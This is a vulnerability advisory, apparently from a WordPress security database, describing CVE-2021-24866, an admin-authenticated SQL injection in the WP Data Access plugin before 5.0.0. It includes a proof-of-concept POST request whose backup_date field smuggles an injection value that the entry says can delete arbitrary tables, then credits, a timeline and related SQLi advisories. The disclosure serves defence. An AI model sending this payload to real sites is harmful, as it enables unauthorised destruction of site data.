WP Data Access < 5.0.0 – Admin+ SQL Injection | CVE 2021-24866 | Plugin Vulnerabilities

Description

The plugin does not properly sanitise and escape the backup_date parameter before using it a SQL statement, leading to a SQL injection issue and could allow arbitrary table deletion

Proof of Concept

POST /wp-admin/admin.php?page=wpdataaccess&tab=repository HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

remove_one_backup=true&_wpnonce=a5df98f178&backup_date=`,`xxx.xxx

Affects Plugins

Fixed in 5.0.0

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

ZhongFu Su(JrXnm) of Wuhan University

Submitter

ZhongFu Su(JrXnm) of Wuhan University

Submitter website

https://blog.szfszf.top

Verified

Yes

WPVDB ID

a9073616-ffd6-4956-b2e7-0fb2eac6e9b5

Timeline

Publicly Published

2021-11-08 (about 2 years ago)

Added

2021-11-08 (about 2 years ago)

Last Updated

2022-09-26 (about 1 years ago)

Other

Published

Title

Published

2023-01-12

Title

Simple Membership WP < 1.8 - Admin+ SQLi

Published

2023-09-04

Title

WP Project Manager < 2.6.1 - Subscriber+ SQLi

Published

2023-12-21

Title

Pre* Party Resource Hints < 1.8.20 - Admin+ SQLi

Published

2023-04-24

Title

HTTP Headers < 1.18.8 - Admin+ SQL Injection

Published

2012-11-05

Title

Ajax Post Search <= 1.3 - SQL Injection